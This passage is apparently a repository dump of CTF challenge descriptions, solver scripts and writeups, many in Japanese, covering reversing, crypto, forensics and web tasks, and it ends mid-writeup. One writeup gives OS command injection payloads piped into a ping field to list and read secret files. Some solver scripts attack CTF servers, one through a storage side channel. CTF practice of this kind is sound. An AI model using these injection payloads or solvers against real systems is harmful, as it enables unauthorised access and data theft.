Requirements: • You must have 7zip installed • Drop the InceptionCTF.7z on the Desktop as “InceptionCTF” • Use the option “Extract to \"<name of directory>\\” for the CTF to function properly Missing either of the above may result in complications which may cause issues when attempting to find flags.\n\nNOTE: These challenges have a flag format of RITSEC{}\n\nDream 1: We have to get to their subconscious first, look for a hidden text file within the directory “Reality” this flag will unlock the next directory.\n\n```\nWe would like to thank our sponsor @SRA for contributing this challenge!\n```" }, { "alpha_fraction": 0.7798165082931519, "alphanum_fraction": 0.8027523159980774, "avg_line_length": 18.81818199157715, "blob_id": "18970fdb8fb2bd671c6ef20aaa615477c29f1d68", "content_id": "b6e385c90033129aaed0f7fcc8ae7498a43c2e68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "no_license", "max_line_length": 111, "num_lines": 11, "path": "/2021/WaniCTF21-spring/watch_animal/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "スーパーかわいい動物が見れるWebサービスを作ったよ。\n\[email protected]\n\nのメアドの人のパスワードがフラグです。\n\nhttps://watch.web.wanictf.org/\n\n[web-watch-animal.zip](https://score.wanictf.org/storage/vgytucbfsin9ocpx5vmla2mmaokd09nt/web-watch-animal.zip)\n\nWriter : okmt\n" }, { "alpha_fraction": 0.713004469871521, "alphanum_fraction": 0.7533632516860962, "avg_line_length": 19.363636016845703, "blob_id": "ec4db0a62f9ebcb480a982cbb57b60ecb269d109", "content_id": "45c77f232d6b5c6846baa87b0ef76e15f463c664", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 223, "license_type": "no_license", "max_line_length": 79, "num_lines": 11, "path": "/2021/BCACTF_2.0/I_Can_Haz_Interwebz/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Awww! Look at these cute and adorable cats helping me navigate the interwebzes.\n\n`nc misc.bcactf.com 49155`\n\nHint 1 of 2\n\nIf you don't have it, install netcat.\n\nHint 2 of 2\n\nYou'll need to run the command from the terminal." }, { "alpha_fraction": 0.6081730723381042, "alphanum_fraction": 0.8317307829856873, "avg_line_length": 45.22222137451172, "blob_id": "c9544526c656e0030c6071166e61156b9ae63a78", "content_id": "e299930082005a36e4efff56c0043ad4adad8a5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 416, "license_type": "no_license", "max_line_length": 165, "num_lines": 9, "path": "/2021/redpwnCTF_2021/beginner-generic-pwn-number-0/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "rob keeps making me write beginner pwn! 
i'll show him...\n\n`nc mc.ax 31199`\n\nDownloads\n\n[beginner-generic-pwn-number-0](https://static.redpwn.net/uploads/1e27cfadfb40b4f3faa522e57565371c52ef70e46830aab2c8d6c35f3808b319/beginner-generic-pwn-number-0)\n\n[beginner-generic-pwn-number-0.c](https://static.redpwn.net/uploads/ce82796645cd48396ac95cd649e83faaf121589d578096a141c56ee444347a54/beginner-generic-pwn-number-0.c)\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.7916666865348816, "avg_line_length": 35, "blob_id": "b71e774df28406284c9307ca051e8ec5d314a6e7", "content_id": "296e6ef4e28b8f2309ac716808159ab8ab8a9812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 306, "license_type": "no_license", "max_line_length": 156, "num_lines": 8, "path": "/2020/Harekaze_mini_CTF_2020/What_time_is_it_now/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# What time is it now?\n\nそうねだいたいね…\n\nhttp://harekaze2020.317de643c0ae425482fd.japaneast.aksapp.io/what-time-is-it-now/\n\nAttachments: [what-time-is-it-now.zip](https://static.harekaze.com/web/what-time-is-it-now/9f8166f7d1a170ce19e98278035b1329b73647ab/what-time-is-it-now.zip)\nAuthor: st98\n" }, { "alpha_fraction": 0.504273533821106, "alphanum_fraction": 0.5441595315933228, "avg_line_length": 16.600000381469727, "blob_id": "1b31dbba2a4d25adb615e8cd56a63938ff4bbec3", "content_id": "ec4a40100074b17c12ae08f3548170997b8c942a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "no_license", "max_line_length": 41, "num_lines": 20, "path": "/2020/WaniCTF/Find_a_Number/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nconn = remote('number.wanictf.org',60000)\nn_min, n_max = 0, 500000\n\nwhile True:\n\n    conn.recvuntil('input:')\n    mid = (n_min + n_max) // 2\n    conn.sendline(str(mid))\n\n    msg = str(conn.recvlines(2))\n\n    if 'small' in msg:\n        n_min = mid\n    elif 'big' in msg:\n        n_max = mid\n    else:\n        print(msg)\n        break" }, { "alpha_fraction": 0.7771381735801697, "alphanum_fraction": 0.7976973652839661, "avg_line_length": 92.61538696289062, "blob_id": "2a3057c3b600391eaa9fd8d6d1664d2cf381089c", "content_id": "4af22e9e18f149c95548d377e0383325ef0565a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 757, "num_lines": 9, "path": "/2021/RITSEC_CTF_2021/PleaseClickAlltheThings_1_BegineersRITSEC_html/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Note: this challenge is the start of a series of challenges. The purpose of this CTF challenge is to bring real-world phishing attachments to the challengers and attempt to find flags (previously executables or malicious domains) within the macros. This is often a process used in IR teams and becomes an extremely valuable skill. In this challenge we’ve brought to the table a malicious html file, GandCrab/Ursnif sample, and an IceID/Bokbot sample. 
We’ve rewritten the code so that it contains no malicious execution; however, system changes may still occur when executing. Also, some of the functionality has been snipped and will likely not reveal itself via dynamic analysis.\n\n```\n• Outlook helps, with proper licensing to access necessary features\n ◦ Otherwise oledump or similar would also help but isn’t necessary\n• CyberChef is the ideal tool to use for decoding\n```\n\nPart 1: Start with the HTML file and let’s move our way up: open and/or inspect the HTML file provided in the message file. There is only one flag in this document.\n\nThis challenge is brought to you by SRA\n\n[Please_Click_all_the_Things.7z](https://ctf.ritsec.club/files/40447a17c9f327c941206ef0c3adb451/Please_Click_all_the_Things.7z?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6MzV9.YHLarg.UP-rOVR2jIhNepmcdegcthhTifU)" }, { "alpha_fraction": 0.5268249511718750, "alphanum_fraction": 0.5444151163101196, "avg_line_length": 20.865385055541992, "blob_id": "e400068dc32238c194175d5fcb20d1a068a0e5b6", "content_id": "2aa5fe4777e51f63ce3062d0ceedff20c56cf702", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 87, "num_lines": 52, "path": "/2021/Google_Capture_The_Flag_2021/FILESTORE/6e5c4cbba595ef1c9d22bfd958dc9144b863081d359a4c27a366c5b8d48b99a26d9b5c4c4bb56db7890b6f188a1ae1b4371d568a22a12e4386d3c0f91dc6c29b/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\ncontext.log_level = 'error'\n\nimport re\nimport string\n\nSTRING = string.digits + string.ascii_letters + string.punctuation\n\nio = remote('filestore.2021.ctfcompetition.com', '1337')\nio.recvuntil('exit\\n')\n\ndef store(data):\n    io.sendline('store')\n    io.sendline(data)\n    io.recvuntil('exit\\n')\n\ndef status():\n    io.sendline('status')\n    storage = re.search(r'(\\d\\.\\d+)kB/', io.recvuntil('Menu').decode('utf-8')).group(1)\n    io.recvuntil('exit\\n')\n    return float(storage)\n\npattern = '0134cdfinptuCFMPRT_{}'\n## searching used char in the flag \n# pattern = ''\n# for s in STRING:\n#     current = status()\n#     store(s)\n#     after = status()\n#     if current == after:\n#         pattern += s\n\nflag = 'CTF'\nwhile True:\n    tmp = flag[-1]\n    while True:\n        for p in pattern:\n            current = status()\n            store(tmp + p)\n            after = status()\n            if current == after:\n                tmp += p\n                print(tmp)\n                break\n        if len(flag) % 16 == 0 or p == '}':\n            break\n    flag += tmp[1:]\n    if flag[-1] == '}':\n        break\nprint(flag)\n\nio.close()\n" }, { "alpha_fraction": 0.7781955003738403, "alphanum_fraction": 0.7932330965995789, "avg_line_length": 58.22222137451172, "blob_id": "b5e2ad87f57dd0c61467b0e6f2fac3d79c4ed1cf", "content_id": "b0b6f82346b94b8139ad441d034fb0a4c4a1dc96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 532, "license_type": "no_license", "max_line_length": 330, "num_lines": 9, "path": "/2021/BCACTF_2.0/Digitally_Encrypted_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald has just learned about this program called Digital which allows him to create circuits. Gerald wants to send messages to his friend, also named Gerald, but doesn't want Gerald (a third one) to know what they are saying. 
Gerald, therefore, built this encryption circuit to prevent Gerald from reading his messages to Gerald.\n\n[circuit_1.dig](https://objects.bcactf.com/bcactf2/digital1/circuit_1.dig)\n\n[encrypted.txt](https://objects.bcactf.com/bcactf2/digital1/encrypted.txt)\n\nHint 1 of 1\n\nhttps://github.com/hneemann/Digital" }, { "alpha_fraction": 0.32774868607521057, "alphanum_fraction": 0.3832460641860962, "avg_line_length": 29.838708877563477, "blob_id": "4e610ac7b60437e8d4cfd708a048f7e871a3bec1", "content_id": "a884707df513bbca320fef9f9780ccb742b931fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 957, "license_type": "no_license", "max_line_length": 98, "num_lines": 31, "path": "/2020/SunshineCTF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Sunshine CTF\n\n* https://2020.sunshinectf.org/\n\n* 2020/11/07 23:00 JST — 2020/11/09 23:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------------- | -------------------------------------------- | -------------- | ----: | -----: |\n| Reversing | [Hotel Door Puzzle](Hotel_Door_Puzzle) | angr | 100 | |\n| Crypto | [Magically Delicious](Magically_Delicious) | octal | 100 | |\n| Web | [Password Pandemonium](Password_Pandemonium) | javascript | 100 | |\n| Speedrun, pwn | [speedrun-00](speedrun-00) | stack overflow | 10 | |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------------ | ---------------------- | -------------------- | ----: | -----: |\n\n---\n\n## Result\n\n* 313 points\n\n* 143 / 742 (> 1 pt)" }, { "alpha_fraction": 0.7529215216636658, "alphanum_fraction": 0.7562604546546936, "avg_line_length": 15.189188957214355, "blob_id": "da54205e830b98b42464175fbe3f50515215561f", "content_id": "91561108131c2df9b7ce4d9534db1ad9eae3cb6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 757, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/2021/UIUCTF_2021/hvhpgs{synt}/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```\n$ ./chal\nenter input with the form: flag_words_with_underscores_and_letters\ngive_me_flag\nincorrect\nenter input with the form: flag_words_with_underscores_and_letters\nflag_words_with_underscores_and_letters\nvery funny\n```\n\nGhidraで解析したところ、\n\n```\nazeupqd_ftq_cgqefuaz_omz_ymotuzqe_ftuzwu_bdabaeq_fa_o\n```\n\nという文字列があり、これをROT14したところ\n\n```\nonsider_the_question_can_machines_thinki_propose_to_c\n```\n\nとなった。\n\n意味が通るようにすると\n\n```\ni_propose_to_consider_the_question_can_machines_think\n```\n\nとなる。これを入力したところフラグが得られた。\n\n<!-- uiuctf{i_propose_to_consider_the_question_can_machines_think} -->\n" }, { "alpha_fraction": 0.7334801554679871, "alphanum_fraction": 0.799559473991394, "avg_line_length": 34, "blob_id": "e63a9e2bccc102523c2401a13aca96fe7fd26e46", "content_id": "2ca4a36340f6dd16ca894eebff920d60d2ce58e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 664, "license_type": "no_license", "max_line_length": 205, "num_lines": 13, "path": "/2020/WaniCTF/ALLIGATOR_01/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ワニ博士のPCでは,悪意のあるプロセスが実行されているみたいです。\n\n取得したメモリダンプから、”evil.exe”が実行された日時を報告してください。\n\n(注意: スペースはすべて半角のアンダースコアにしてください)\n\nexample: FLAG{1234-56-78_99:99:99_UTC+0000}\n\n問題ファイル: 
[ALLIGATOR.zip](https://mega.nz/file/dHZWkTzA#9a-yHID2Fg_upTaVmYKhO_3-gu7Q0JbLiw-HSfarQyU) (ミラー: [ALLIGATOR.zip](https://drive.google.com/file/d/1yb6Ojbl7xkgRYU-4DgNi-0iJWT6jO2uW/view?usp=sharing))\n\n推奨ツール: [volatility](https://github.com/volatilityfoundation/volatility)\n\nWriter : takushooo" }, { "alpha_fraction": 0.5118483304977417, "alphanum_fraction": 0.5876777172088623, "avg_line_length": 19.14285659790039, "blob_id": "af05edde8d08bd70831c1dfebc1f3be52eb5bdbf", "content_id": "926c6e09b1f12faeac77c8bd2492cc4b546cfe84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 47, "num_lines": 21, "path": "/2021/angstromCTF_2021/FREE_FLAGS!!1!!/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ndef solve(b,c):\n a = 1\n b = -b\n x1 = (-b + math.sqrt(b**2-4*a*c))/(2*a)\n x2 = (-b - math.sqrt(b**2-4*a*c))/(2*a)\n return [str(int(x1)), str(int(x2))]\n\nio = remote('shell.actf.co', 21703)\n# 1\nio.recvuntil('What number am I thinking of???')\nio.sendline(str(int(0x7a69)))\n# 2\nio.recvline()\nio.sendline(' '.join(solve(0x476,0x49f59)))\n# 3\nio.recvline()\nio.sendline('banana')\n\nio.interactive()" }, { "alpha_fraction": 0.6175298690795898, "alphanum_fraction": 0.7855245471000671, "avg_line_length": 34.046512603759766, "blob_id": "06d3aa90c35daea43d330bbc0574af0f959b6cc3", "content_id": "bdda7bef6bdbffa8fb2e1ebfd4de7d52e162f916", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 360, "num_lines": 43, "path": "/2020/kksctf_open_2020/bson/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n```json\n{\"task_name\":\"bson\",\"message_pack_data\":\"82a36b65795ca4666c6167dc003137372f27362f6c3203352f033f6c6c30033e292803343d2a6f0325332903282e35393803316f2f2f1c3b39032c3d3f3721\"}\n```\n\n`message_pack_data`の部分を文字列に直してみると、\n\n```\n.£key\\¤flagÜ.177/'6/l2.5/.?ll0.>)(.4=*o.%3).(.598.1o//.;9.,=?7!\n```\n\nとなり、`key`と`flag`という単語が出てくる。\n\nこの後どうすればよいのか分からなかった...\n\n# Solution\n\n**[writeup]**\n\n* https://github.com/r00tstici/writeups/tree/master/kksCTF_2020/bson\n\n`massage_pack_data`の値は、その名の通り`MessagePack`というフォーマットになっている。\n\n* https://msgpack.org/ja.html\n\nこれをデコードすると以下のようになる。\n\n```json\n{\"key\":92,\"flag\":[55,55,47,39,54,47,108,50,3,53,47,3,63,108,108,48,3,62,41,40,3,52,61,42,111,3,37,51,41,3,40,46,53,57,56,3,49,111,47,47,28,59,57,3,44,61,63,55,33]}\n```\n\n* [CyberChef(From Hex, From MessagePack)](https://gchq.github.io/CyberChef/#recipe=From_Hex('Space')From_MessagePack()JSON_Minify()&input=ODJhMzZiNjU3OTVjYTQ2NjZjNjE2N2RjMDAzMTM3MzcyZjI3MzYyZjZjMzIwMzM1MmYwMzNmNmM2YzMwMDMzZTI5MjgwMzM0M2QyYTZmMDMyNTMzMjkwMzI4MmUzNTM5MzgwMzMxNmYyZjJmMWMzYjM5MDMyYzNkM2YzNzIx)\n\n`flag`と`key`とのXORをとるとフラグが得られる。\n\n* [CyberChef(From Decimal, XOR)](https://gchq.github.io/CyberChef/#recipe=From_Decimal('Comma',false)XOR(%7B'option':'Decimal','string':'92'%7D,'Standard',false)&input=NTUsNTUsNDcsMzksNTQsNDcsMTA4LDUwLDMsNTMsNDcsMyw2MywxMDgsMTA4LDQ4LDMsNjIsNDEsNDAsMyw1Miw2MSw0MiwxMTEsMywzNyw1MSw0MSwzLDQwLDQ2LDUzLDU3LDU2LDMsNDksMTExLDQ3LDQ3LDI4LDU5LDU3LDMsNDQsNjEsNjMsNTUsMzM)\n\n# Comment\n\n`key`名がヒントになっていたとは... 
BSONについて調べまくっていた。" }, { "alpha_fraction": 0.5876120328903198, "alphanum_fraction": 0.7212713956832886, "avg_line_length": 25.12765884399414, "blob_id": "a17165c0a5ff1e7b2da566fc9be4128484458dbd", "content_id": "b61b1c8579ffadd89323c7342d79c45ea936032f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1635, "license_type": "no_license", "max_line_length": 111, "num_lines": 47, "path": "/2020/CyberSecurityRumble2020/Cyberwall/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://chal.cybersecurityrumble.de:3812/ にアクセスする。\n\n![](img/2020-10-31-13-38-21.png)\n\nページのソースを見るとパスワードが直書きされている。\n\n![](img/2020-10-31-13-48-18.png)\n\nPasswordに`rootpw1337`と入力しログイン。\n\nログインに成功した後、左側の[Debugging] メニューからpingを送信できる画面が表示される。試しに`localhost`と入れると結果が返ってくる。\n\n![](img/2020-10-31-14-38-26.png)\n\n`localhost | echo 'Hello'`と入力すると`Hello`と返ってくるのでどうやらコマンドインジェクションが通用しそうだと推測。\n\n* [タイガーチームサービス/DEF CON CTF Qualsにチャレンジ!](https://www.tiger1997.jp/report/activity/securityreport_20140523.html)\n\n * pingでのOSコマンドインジェクション(類似問題)\n\n![](img/2020-10-31-14-43-39.png)\n\n`ls -la` でカレントディレクトリにあるファイルを調べる。\n\n```bash\nlocalhost | ls -la\n\ntotal 32\ndrwxr-xr-x 1 root root 4096 Oct 30 18:39 .\ndrwxr-xr-x 1 root root 4096 Oct 30 18:35 ..\n-rw-r--r-- 1 root root 16 Oct 15 12:49 requirements.txt\ndrwxr-xr-x 3 root root 4096 Oct 15 12:49 static\n-rw-r--r-- 1 root root 85 Oct 15 12:49 super_secret_data.txt\ndrwxr-xr-x 2 root root 4096 Oct 15 12:49 templates\n-rw-r--r-- 1 root root 1070 Oct 15 12:49 webapp.py\n-rw-r--r-- 1 root root 23 Oct 15 12:49 wsgi.py\n```\n\n`super_secret_data.txt`の中身を`cat`で見る。\n\n```bash\nlocalhost | cat super_secret_data.txt\n```\n\n<!-- CSR{oh_damnit_should_have_banned_curl_https://news.ycombinator.com/item?id=19507225} -->" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.625, "avg_line_length": 21.399999618530273, "blob_id": "e6f0e9c2add358ad84ea391792aa40a76a7887fc", "content_id": "4cd1b87328accaa72451f6ab5b857080adec5f8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 59, "num_lines": 10, "path": "/2021/WaniCTF21-spring/illegal_image/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nfrom scapy.all import rdpcap\n\npcap = rdpcap(os.path.dirname(__file__)+'/icmp.pcap')\n\ndata = [p.load for p in pcap]\n\nwith open(os.path.dirname(__file__)+'/flag.jpg','wb') as f:\n for d in data:\n f.write(d)\n" }, { "alpha_fraction": 0.7068965435028076, "alphanum_fraction": 0.7586206793785095, "avg_line_length": 10.800000190734863, "blob_id": "c304f6f2568b07ee6f6e6e14635b6520e57fb1a3", "content_id": "165f49be4b8761df7d4da554501006187600fd59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 78, "license_type": "no_license", "max_line_length": 28, "num_lines": 5, "path": "/2021/WaniCTF21-spring/fake/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "偽物を見破れますか?\n\nhttps://fake.web.wanictf.org\n\nWriter : hi120ki" }, { "alpha_fraction": 0.5853080749511719, "alphanum_fraction": 0.7132701277732849, "avg_line_length": 20.149999618530273, "blob_id": "52877a3915af42e5de28caa886be060a241443ff", "content_id": "355e88971e9d2718f2d6315dfd7307e9c6adbacc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 482, 
"license_type": "no_license", "max_line_length": 119, "num_lines": 20, "path": "/2021/DiceCTF_2021/babymix/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n添付の`babymix`を実行するとパスワードが求められる。\n\n```\nWith our propietary babymix™ technology, we assure you that this password cannot be stolen, modified, or tampered with!\n\nPlease enter your admin password: aaa\n\nIncorrect :(\n```\n\nangr を使って調べる。\n\n```\n$ python solver.py\nb'm1x_it_4ll_t0geth3r!1!\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00 @\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n```\n\n<!-- dice{m1x_it_4ll_t0geth3r!1!} -->" }, { "alpha_fraction": 0.7515923380851746, "alphanum_fraction": 0.7515923380851746, "avg_line_length": 18.625, "blob_id": "571b7515144beeaa6134ff1e6eeb7602c9f3794a", "content_id": "9d088c32bbfba4e2a6ce86d09a0c254c94865e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 157, "license_type": "no_license", "max_line_length": 92, "num_lines": 8, "path": "/2021/HeroCTF_v3/Atoms/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Dmitri sends us this message, will you be able to retrieve the secret message hidden inside?\n\n```\nMtMdDsFmMdHsMdMdUuo\n```\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.7578475475311279, "alphanum_fraction": 0.7645739912986755, "avg_line_length": 62.85714340209961, "blob_id": "b2ea04338cf543751d4ddd3af2a3078cff9b27cf", "content_id": "74fb8155dbcc61390470888524555d7c5909473b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 446, "license_type": "no_license", "max_line_length": 264, "num_lines": 7, "path": "/2021/BCACTF_2.0/Geralds_New_Job/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Being a secret agent didn't exactly work out for Gerald. He's been training to become a translator for dinosaurs going on vacation, and he just got his traslator's licence. But when he sees it, it doesn't seem to belong to him... can you help him find his licence?\n\n[gerald.pdf](https://objects.bcactf.com/bcactf2/polyglot/gerald.pdf)\n\nHint 1 of 1\n\nGerald had to know a lot of languages to become a translator. He knows there's a word for that..." 
}, { "alpha_fraction": 0.6036961078643799, "alphanum_fraction": 0.7351129651069641, "avg_line_length": 21.136363983154297, "blob_id": "aa490307ceb33727f887e615b878f1d20698f79d", "content_id": "ba7f6bd972a56acc6443eb70a618b0ce6b376d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 619, "license_type": "no_license", "max_line_length": 216, "num_lines": 22, "path": "/2021/redpwnCTF_2021/wstrings/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file wstrings\nwstrings: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=97d891ccc43a726635b32182876bf7e39fccd8ce, not stripped\n```\n\n実行してみるとフラグの入力を求められる。\n\n```bash\n$ ./wstrings\nWelcome to flag checker 1.0.\nGive me a flag> hoge\n```\n\nGhidraで解析してみると、フラグ文字列と直接比較している部分が見つかった。\n\n![](img/2021-07-10-15-13-50.png)\n\n<!-- flag{n0t_al1_str1ngs_ar3_sk1nny} -->\n" }, { "alpha_fraction": 0.7554240822792053, "alphanum_fraction": 0.7751479148864746, "avg_line_length": 38.07692337036133, "blob_id": "6e0010edfc9a74cb403066ceafab6bfd2e621f13", "content_id": "0211aa61d5461a59e407c09c19124d4feb5041c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 507, "license_type": "no_license", "max_line_length": 194, "num_lines": 13, "path": "/2021/BCACTF_2.0/RSAtrix_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Sure, you saw our first prototype, but you could obviously see it was just RSA slapped on a permutation matrix. Will you still be able to decode our messages if we conjugate our generator first?\n\n[rt2.sage](https://objects.bcactf.com/bcactf2/rsatrix-2/rt2.sage)\n\n[enc.txt](https://objects.bcactf.com/bcactf2/rsatrix-2/enc.txt)\n\nHint 1 of 2\n\nWhat do you know about elements of the encoded matrix?\n\nHint 2 of 2\n\nHere, \"conjugating a matrix\" means performing a similarity transformation (for ease of googling)." 
}, { "alpha_fraction": 0.7752442955970764, "alphanum_fraction": 0.8143322467803955, "avg_line_length": 18.1875, "blob_id": "fbf379a66f1ff87f18c0fdeb3f02115a9a705e82", "content_id": "781896e67dd3ce385d960202704805b477a5813e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 559, "license_type": "no_license", "max_line_length": 101, "num_lines": 16, "path": "/2021/WaniCTF21-spring/licence/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "このプログラムは非常に強力なライセンス確認処理が実装されています。\n\nただ、今持っているライセンスファイルは間違っているようです。\n\n正しいライセンスファイルを見つけて頂けますか?\n\n```\n$ ./licence key.dat\nFailed to activate.\n```\n\n複雑な処理をシンボリック実行で解析してくれるツール「angr」を使えば簡単に解けるかも。\n\n[rev-licence.zip](https://score.wanictf.org/storage/b374pl6ue0jriessvqyaje39m0ejwx8d/rev-licence.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.5663082599639893, "alphanum_fraction": 0.6272401213645935, "avg_line_length": 16.4375, "blob_id": "c6bba795a3372dc9bb6a652f66de41fe1d291998", "content_id": "207a4d006698be3a89025004d46d716331bd42f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 42, "num_lines": 16, "path": "/2021/SECCON_Beginners_CTF_2021/simple_RSA/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom flag import flag\n\nflag = bytes_to_long(flag.encode(\"utf-8\"))\n\np = getPrime(1024)\nq = getPrime(1024)\nn = p * q\ne = 3\n\nassert 2046 < n.bit_length()\nassert 375 == flag.bit_length()\n\nprint(\"n =\", n)\nprint(\"e =\", e)\nprint(\"c =\", pow(flag, e, n))\n" }, { "alpha_fraction": 0.4229508340358734, "alphanum_fraction": 0.6149882674217224, "avg_line_length": 24.41666603088379, "blob_id": "55c13e40c66c98b621c29d31bb0c8abdd7cef310", "content_id": "d04a4a031975afc26465f70cec6bba24b8a35936", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2369, "license_type": "no_license", "max_line_length": 246, "num_lines": 84, "path": "/2021/RaRCTF_2021/verybabyrev/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ ./verybabyrev\nEnter your flag: hoge\nNope!\n```\n\n正しいフラグが入力できればよさそうなので、Ghidraで解析する。\n\n```c\n local_108 = 0x45481d1217111313;\n local_100 = 0x95f422c260b4145;\n local_f8 = 0x541b56563d6c5f0b;\n local_f0 = 0x585c0b3c2945415f;\n local_e8 = 0x402a6c54095d5f00;\n local_e0 = 0x4b5f4248276a0606;\n local_d8 = 0x6c5e5d432c2d4256;\n local_d0 = 0x6b315e434707412d;\n local_c8 = 0x5e54491c6e3b0a5a;\n local_c0 = 0x2828475e05342b1a;\n local_b8 = 0x60450073b26111f;\n local_b0 = 0xa774803050b0d04;\n local_a8 = 0;\n printf(\"Enter your flag: \");\n fgets((char *)&local_98,0x80,stdin);\n local_c = 0;\n if ((char)local_98 != 'r') {\n puts(\"Nope!\");\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n while (local_c < 0x7f) {\n *(byte *)((long)&local_98 + (long)local_c) =\n *(byte *)((long)&local_98 + (long)local_c) ^\n *(byte *)((long)&local_98 + (long)(local_c + 1));\n local_c = local_c + 1;\n }\n iVar1 = memcmp(&local_108,&local_98,0x61);\n if (iVar1 == 0) {\n puts(\"Correct!\");\n /* WARNING: Subroutine does not return */\n exit(1);\n }\n puts(\"Nope!\");\n /* WARNING: Subroutine does not return */\n exit(0);\n```\n\n入力したフラグ`local_98`は\n\n* 1文字目が`r`である\n\n* 
